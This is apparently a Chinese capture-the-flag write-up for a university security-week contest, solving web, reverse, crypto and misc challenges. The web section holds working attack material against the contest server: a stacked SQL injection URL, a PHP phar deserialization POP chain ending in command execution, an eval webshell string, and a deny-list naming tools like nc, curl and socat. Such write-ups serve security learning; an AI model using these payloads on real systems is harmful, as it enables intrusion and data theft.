广西大学第一届 “网络安全宣传周” 信息安全实践赛wp

Web

baby_网站目录

f12 访问

image-20211022185535525

baby_request

get和post

image-20211022185802236

1
2
3
http://120.24.194.57:3702/request/?text1=yesyesyes&text2=goodgoodgood

text3=wellwellwell&text4=nicenicenice

baby_前端

image-20211022185843985

jsfuck 放控制台里跑一下就有了

image-20211022190135736

baby_预防虫虫!

image-20211022190222656

image-20211022190344846

五子棋

ban掉js 在/js/script里找flag

image-20211022190451764

baby_快来猜大小

嗯点

baby_注入

无过滤 直接sqlmap跑

ez_快来猜拳啊

cookie里的count值用来计数且固定 所以直接写脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
# coding=gbk
import requests
import re
url="http://120.24.194.57:3703/the_finger_guessing_game/index.php?b=quan"
session = requests.session();

def exp():
    payload = "Y2ZjZDIwODQ5NWQ1NjVlZjY2ZTdkZmY5Zjk4NzY0ZGE%3D"
    flags = ""
    while True:
        headers = {
            "Host": "120.24.194.57:3703",
            "Pragma": "no-cache",
            "Cache-Control": "no-cache",
            "Upgrade-Insecure-Requests": "1",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 Edg/94.0.992.50",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
            "Referer": "http://120.24.194.57:3703/the_finger_guessing_game/index.php?b=quan",
            "Accept-Encoding": "gzip, deflate",
            "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",
            "Cookie": "count={0}; welcomebanner_status=dismiss; cookieconsent_status=dismiss; language=en; continueCode=LRDPV4rmB3pze58njKXq9NdErHjTRi2MuZ3slNGQMgZ2wbvJalY6O1y7xoEW; PHPSESSID=8pa8oeu0hj8s4q79s1brd83st4".format(
                payload)
        }
        response=session.get(url=url,headers=headers)
        if "下面是你的flag:" in response.text:
            flags+=re.search("下面是你的flag:(.)",response.text).group(1)
            print (flags)
            payload = response.cookies.get("count")
        #print(session.get(url=url,headers=headers).text)


exp();

image-20211022191113442

ez_不能说的秘密

payload:

image-20211022192505296

1
2
3
4
5
6
7
8
9
10
<?php
header("Content-Type: text/html;charset=utf-8");
show_source(__FILE__);

class a{
    public $usernmae = "admin";
    public $do_u_want_flag="yes! yes! yse!";
    public $youwant="flag2";
}
echo serialize(new a());

变量覆盖直接post secret

绕过直接ban掉js

ez_猜猜我是谁

原题应该是某一年国赛的just soso

这里用到反序列化的引用类型

大小写绕过正则即可

payload:

image-20211022193643880

ez_web

观察url 考虑base64

image-20211022193720679

MmUyZjZjNmY2NzZmMmU3MDZlNjc=

再考虑base64

2e2f6c6f676f2e706e67

考虑十六进制串解码

./logo.png

则考虑按规律改变文件名进行文件读取

读取./index.php

image-20211022193915693

base64解码

image-20211022193939504

easy_web2.0

依然考虑easy_web的文件构造方式,发现成功解码出tmp.jpg

考虑读取./index.php

image-20211022194104038

此处设置了open_basedir 意味着此题的所有文件大概都在这个目录下

在没有任何下一步的提示下(我做出时还没放hint)

考虑扫目录

image-20211019140101751

加入.php的后缀 扫出web.php

利用第一步的文件读取读取出web.php

image-20211022194510863

考点为弱比较和md5对数组使用的特性和伪协议

绕过兼满足条件payload

one[]=1&two[]=2&file=data://text/plain,welcome!&temp=O:4:”File”:1:{s:3:”dir”;s:9:”240610708”;}

image-20211022194855247

用第一步的文件读取读取

flag_md(8ef52dea328bde9315cc15eb6b770519).php

image-20211022194938166

base64解码得

image-20211022195000362

SSSSSSSQL

试密码试出7777

image-20211022195105928

找了很久的注入点,一开始一直在登录界面和这个搜索框尝试注入,但一直没有结果。

后来发现这个页面中只有“查看”这个按钮是有功能性的,试图在前端用检查元素找出接口,但无法找到

只好翻前端的js

image-20211022195510457

审查到有77777777.php,传参为page和id

进去看看

先在page堆叠注,发现过滤了很多东西,fuzz一下发现几乎过滤所有东西,应该不是在这块地方注

在id堆叠注,发现image-20211022195843677

成功注出

则依次show databases;use linkflag;show tables;

image-20211022195929811

show columns from ffffffflags

image-20211022200010054

找到f1a9

接下来强网杯随便注的payload来打,发现rename和alter都ban了

只剩预处理了

直接拿payload打

image-20211022200610042

1
http://120.24.194.57:3703/SSSSSSSQL/77777777.php?id=1';show databases;use linkflag;show tables;show columns from ffffffflags;seT @sql = CONCAT('se','lect f1a9 from ffffffflags;');Prepare stmt from @sql;EXEcUTE stmt;#

ez_反序列化

题目提示反序列化 考虑phar

因为满足phar三要素 可控上传 必需符号没ban 有读取文件的函数

先读./read.php

image-20211022200753291

发现class.php

读class.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
<?php
ini_set('open_basedir','/var/www/html/bbunser/');

class aa{
    public $name;

    public function __construct(){
        $this->name='aa';
    }

    public function __destruct(){
        $this->name=strtolower($this->name);
    }
}

class ff{
    private $content;
    public $func;

    public function __construct(){
        $this->content="\<?php @eval(\$_POST[1]);?>";
    }

    public function __get($key){
	if(!preg_match('/bash|nc|exec|curl|whois|socat|telnet|python|php|perl|ruby|phpinfo|ls|cat|tac|nl|more|less|head|tail|sed|sort|uniq|rev|base|echo|mv|cp|rm|fl|la|ag|flag|\-|\?|\'|\^|\~|\>|\<|\$/i',$_POST['cmd'])){
        	$this->$key->{$this->func}($_POST['cmd']);    
	}else{
		echo "<br>don't hack";	
	}
    }
}
class zz{
    public $filename;
    public $content='surprise';

    public function __construct($filename){
        $this->filename=$filename;
    }

    public function filter(){
        if(preg_match('/^\/|php:|data|zip|\.\.\//i',$this->filename)){
            die('这不合理');
        }
    }

    public function write($var){
        $filename=$this->filename;
        $lt=$this->filename->$var;
        //此功能废弃,不想写了
    }

    public function getFile(){
        $this->filter();
        $contents=file_get_contents($this->filename);
        if(!empty($contents)){
            return $contents;
        }else{
            die("404 not found");
        }
    }

    public function __toString(){
        $this->{$_POST['method']}($_POST['var']);
        return $this->content;
    }
}

class xx{
    public $name;
    public $arg;

    public function __construct(){
        $this->name='eval';
        $this->arg='phpinfo();';
    }

    public function __call($name,$arg){
        $name($arg[0]);
    }
}

接下来构造pop链

先payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
<?php

highlight_file(__FILE__);
class aa{
    public $name;
    public function __destruct(){
        $this->name=strtolower($this->name);
    }
}

class ff{
    public $content;
    public $func="assert";
    public function __get($key){
        if(!preg_match('/bash|nc|exec|curl|whois|socat|telnet|python|php|perl|ruby|phpinfo|ls|cat|tac|nl|more|less|head|tail|sed|sort|uniq|rev|base|echo|mv|cp|rm|fl|la|ag|flag|\-|\?|\'|\^|\~|\>|\<|\$/i',$_POST['cmd'])){
            $this->$key->{$this->func}($_POST['cmd']);
        }else{
            echo "<br>don't hack";
        }
    }
}
class zz{
    public $filename;  //$ff
    public $content='surprise';
    public function filter(){
        if(preg_match('/^\/|php:|data|zip|\.\.\//i',$this->filename)){
            die('这不合理');
        }
    }
    public function write($var){
        $filename=$this->filename;
        $lt=$this->filename->$var;
        //此功能废弃,不想写了
    }
    public function getFile(){
        $this->filter();
        $contents=file_get_contents($this->filename);
        if(!empty($contents)){
            return $contents;
        }else{
            die("404 not found");
        }
    }

    public function __toString(){
        $this->{$_POST['method']}($_POST['var']); //method=write var=content cmd='phpinfo();'
        return $this->content;
    }
}

class xx{
    public $name;
    public $arg;
    public function __call($name,$arg){
        $name($arg[0]);
    }
}
$aa =new aa();
$aa->name=new zz();
$aa->name->filename=new ff();
$aa->name->filename->content=new xx();
echo serialize($aa);

@unlink("phar.phar");
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); //设置stub
$phar->setMetadata(aa); //将自定义meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
?>
gxuctf{4d8028dd-dfec-4b5c-b4ad-ec5540664fcc}
1
2
入口为__destruct strtolower能进入tostring 则进入zz中 考虑tostring中调用的函数带有参数,而zz中正好有write可以传参调用,则考虑调用write,还剩一个__call和一个__get,发现content是private属性,则正好可以调用get,发现__get,最后进入__call命令执行 至此pop构造完成
post内容为method=write&var=content&cmd=system("l\s");

网上找一个phar的生成文件 生成一个phar.phar传上去,file用phar协议读

最终payload:

image-20211022201542112

直接读image-20211022201619901

但是这题只能用tac读而不能用cat读 我一度以为是我的链子坏了或者哪个地方出错了 考虑环境问题吧还是

Reverse

除了我以外都是非酋

丢进ida 看看cj和cc

看看汇编就知道啦

Ord(a)=97 +14=111 111和Output数组异或,得到flag

玩玩游戏就拿到答案啦

cheat engine 开外挂 改分

看看程序就出来啦

python脚本逆着解密

脚本删了 大概是重新写一个func 的lambda 然后重新和盐值异或

做出的逆向题不到600分 蚌埠住了

Crypto

secret

二进制转字符串

1
TmV3IGNoYWxsZW5nZSEgQ2FuIHlvdSBmaWd1cmUgb3V0IHdoYXQncyBnb2luZyBvbiBoZXJlPyBJdCBsb29rcyBsaWtlIHRoZSBsZXR0ZXJzIGFyZSBzaGlmdGVkIGJ5IHNvbWUgY29uc3RhbnQuIChoaW50OiB5b3UgbWlnaHQgd2FudCB0byBzdGFydCBsb29raW5nIHVwIFJvbWFuIHBlb3BsZSkuCmZxd25sbXksIGR0eid3aiBmcXJ0eHkgeW1qd2ohIHN0YiBrdHcgeW1qIGtuc2ZxIChmc2kgcmZkZ2ogeW1qIG1md2lqeHkuLi4pIHVmd3k6IGYgeHpneHlueXp5bnRzIGhudW1qdy4gbnMgeW1qIGt0cXF0Ym5zbCB5amN5LCBuJ2FqIHlmcGpzIHJkIHJqeHhmbGogZnNpIHdqdXFmaGppIGphandkIGZxdW1mZ2p5bmggaG1md2ZoeWp3IGJueW0gZiBodHd3anh1dHNpanNoaiB5dCBmIGlua2tqd2pzeSBobWZ3Zmh5ancgLSBwc3RicyBmeCBmIHh6Z3h5bnl6eW50cyBobnVtancuIGhmcyBkdHoga25zaSB5bWoga25zZnEga3FmbD8gbW5zeTogYmogcHN0YiB5bWZ5IHltaiBrcWZsIG54IGx0bnNsIHl0IGdqIHRrIHltaiBrdHdyZnkgbGN6aHlrey4uLn0gLSBibW5obSByamZzeCB5bWZ5IG5rIGR0eiB4amogeW1meSB1Znl5andzLCBkdHogcHN0YiBibWZ5IHltaiBodHd3anh1dHNpanNoangga3R3IGwsIGMsIHosIGgsIHksIGZzaSBrIGZ3ai4gZHR6IGhmcyB1d3RnZmdxZCBidHdwIHR6eSB5bWogd2pyZm5zbnNsIGhtZndmaHlqd3ggZ2Qgd2p1cWZobnNsIHltanIgZnNpIG5za2p3d25zbCBodHJydHMgYnR3aXggbnMgeW1qIGpzbHFueG0gcWZzbHpmbGouIGZzdHltancgbHdqZnkgcmp5bXRpIG54IHl0IHp4aiBrd2p2empzaGQgZnNmcWR4bng6IGJqIHBzdGIgeW1meSAnaicgeG10YnggenUgcnR4eSB0a3lqcyBucyB5bWogZnF1bWZnanksIHh0IHltZnkneCB1d3RnZmdxZCB5bWogcnR4eSBodHJydHMgaG1md2ZoeWp3IG5zIHltaiB5amN5LCBrdHFxdGJqaSBnZCAneScsIGZzaSB4dCB0cy4gdHNoaiBkdHogcHN0YiBmIGtqYiBobWZ3Zmh5and4LCBkdHogaGZzIG5za2p3IHltaiB3anh5IHRrIHltaiBidHdpeCBnZnhqaSB0cyBodHJydHMgYnR3aXggeW1meSB4bXRiIHp1IG5zIHltaiBqc2xxbnhtIHFmc2x6ZmxqLgpmenF2cmh1eW1odWp6cWkhIGd6eSB3aGJ0IGVqcWppd3RzIHV3dCBwdHZqcXF0ciBmcmdsdXp2cmhsd2cgZndobW10cXZ0LiB3dHJ0IGppIGggZW1odiBlenIgaG1tIGd6eXIgd2hycyB0ZWV6cnVpOiB2bnlmdWV7cTB4X3V3NHVpX3h3NHVfal9mNG1tX2ZyZ2x1MH0uIGd6eSB4am1tIGVqcXMgdXdodSBoIG16dSB6ZSBmcmdsdXp2cmhsd2cgamkgb3lpdSBweWptc2pxdiB6ZWUgdXdqaSBpenJ1IHplIHBoaWpmIGtxenhtdHN2dCwgaHFzIGp1IHJ0aG1tZyBqaSBxenUgaXogcGhzIGhldXRyIGhtbS4gd3psdCBnenkgdHFvemd0cyB1d3QgZndobW10cXZ0IQ==

base64

1
2
3
New challenge! Can you figure out what's going on here? It looks like the letters are shifted by some constant. (hint: you might want to start looking up Roman people).
fqwnlmy, dtz'wj fqrtxy ymjwj! stb ktw ymj knsfq (fsi rfdgj ymj mfwijxy...) ufwy: f xzgxynyzynts hnumjw. ns ymj ktqqtbnsl yjcy, n'aj yfpjs rd rjxxflj fsi wjuqfhji jajwd fqumfgjynh hmfwfhyjw bnym f htwwjxutsijshj yt f inkkjwjsy hmfwfhyjw - pstbs fx f xzgxynyzynts hnumjw. hfs dtz knsi ymj knsfq kqfl? mnsy: bj pstb ymfy ymj kqfl nx ltnsl yt gj tk ymj ktwrfy lczhyk{...} - bmnhm rjfsx ymfy nk dtz xjj ymfy ufyyjws, dtz pstb bmfy ymj htwwjxutsijshjx ktw l, c, z, h, y, fsi k fwj. dtz hfs uwtgfgqd btwp tzy ymj wjrfnsnsl hmfwfhyjwx gd wjuqfhnsl ymjr fsi nskjwwnsl htrrts btwix ns ymj jslqnxm qfslzflj. fstymjw lwjfy rjymti nx yt zxj kwjvzjshd fsfqdxnx: bj pstb ymfy 'j' xmtbx zu rtxy tkyjs ns ymj fqumfgjy, xt ymfy'x uwtgfgqd ymj rtxy htrrts hmfwfhyjw ns ymj yjcy, ktqqtbji gd 'y', fsi xt ts. tshj dtz pstb f kjb hmfwfhyjwx, dtz hfs nskjw ymj wjxy tk ymj btwix gfxji ts htrrts btwix ymfy xmtb zu ns ymj jslqnxm qfslzflj.
fzqvrhuymhujzqi! gzy whbt ejqjiwts uwt ptvjqqtr frgluzvrhlwg fwhmmtqvt. wtrt ji h emhv ezr hmm gzyr whrs teezrui: vnyfue{q0x_uw4ui_xw4u_j_f4mm_frglu0}. gzy xjmm ejqs uwhu h mzu ze frgluzvrhlwg ji oyiu pyjmsjqv zee uwji izru ze phijf kqzxmtsvt, hqs ju rthmmg ji qzu iz phs heutr hmm. wzlt gzy tqozgts uwt fwhmmtqvt!

原题 凯撒+替换

上ctfcrack

image-20211022203329756

替代直接爆破 写wp的时候找不到那个网站了…

base

直接上basecrack 先base92再 中间还有ascii和base64 32具体顺序忘了

最后十六进制转字符串 gxuctf{y0u_r_the_ma3ter_o5_base_decoding!}

ezRSA

原题 跑e的脚本删了 跑出来52361

这是最后的解密脚本 原题直接拿的

image-20211022204146945

python3.9装crypto库没有bytes_to_long 所以删去bytes_to_long拿到字符串后去官方环境跑结果

image-20211022204339854

V

向下看看到了键盘

第一步解出维吉尼亚vigenere

猜测为压缩包文件密码和提示

直接猜秘钥gxuctf命中

MISC

签到

与佛论禅

how much

上脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
import re
def upper2num(s):
    index = ['零', '壹', '贰', '叁', '肆', '伍', '陆', '柒', '捌', '玖']
    rst = 0
    _ = re.findall(r'(.)仟', s)
    if _:
        rst += 100000 * index.index(_[0])
    _ = re.findall(r'(.)佰', s)
    if _:
        rst += 10000 * index.index(_[0])
    _ = re.findall(r'(.)拾', s)
    if _:
        rst += 1000 * index.index(_[0])
    if re.match(r'^拾', s):  # 拾几元 √  壹拾几元 ×
        rst += 1000
    _ = re.findall(r'(.)元', s)
    if _:
        if _[0] in index:
            rst += 100 * index.index(_[0])
    _ = re.findall(r'(.)角', s)
    if _:
        rst += 10 * index.index(_[0])
    _ = re.findall(r'(.)分', s)
    if _:
        rst += 1 * index.index(_[0])
    return rst

print(upper2num("玖佰陆拾贰元陆角肆分")/100)
sum=0;
with open("D:/FireFoxDownload/how_much.txt","r",encoding="utf8") as f1:
    for line in f1:
        sum+=upper2num(line)/100
    print(sum)

出结果保留两位小数

鹦鹉学舌image-20211019192749676

用Pr找到这一帧 一直没搞懂和docx有什么关系

考虑培根密码

gxuctf{wecomexaxh}

好多word

python的docx库装起来很麻烦

用java写的脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
package src;
import org.apache.poi.POIXMLDocument;
import org.apache.poi.POIXMLTextExtractor;
import org.apache.poi.hwpf.extractor.WordExtractor;
import org.apache.poi.openxml4j.opc.OPCPackage;
import org.apache.poi.xwpf.extractor.XWPFWordExtractor;

import java.io.FileInputStream;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/**
 *  .doc .docx 文档测试类
 *
 */
class TestPoi {

    public static void main(String[] args) {
        TestPoi tp=new TestPoi();
        for (int i = 1; i <500; i++) {
            String content = tp.readWord("C:/Users/86151/Documents/Tencent Files/821361403/FileRecv/word_very_big/"+i+"ya.docx");
            String pattern ="[\\s\\S]+[Gg][Xx][Uu][Cc][Tt][Ff]\\{[\\s\\S]+";
            if(Pattern.matches(pattern,content))
                System.out.println(content);
        }
    }

    /**
     * 读取word文件内容
     *
     * @param path
     * @return buffer
     */
    public String readWord(String path) {
        String buffer = "";
        try {
            if (path.endsWith(".doc")) {
                FileInputStream is = new FileInputStream(path);
                WordExtractor ex = new WordExtractor(is);
                buffer = ex.getText();
                is.close();
            } else if (path.endsWith("docx")) {
                OPCPackage opcPackage = POIXMLDocument.openPackage(path);
                POIXMLTextExtractor extractor = new XWPFWordExtractor(opcPackage);
                buffer = extractor.getText();
                opcPackage.close();
            } else {
                System.out.println("此文件不是word文件!");
            }

        } catch (Exception e) {
            e.printStackTrace();
        }
        return buffer;
    }
}

image-20211020135441723

____end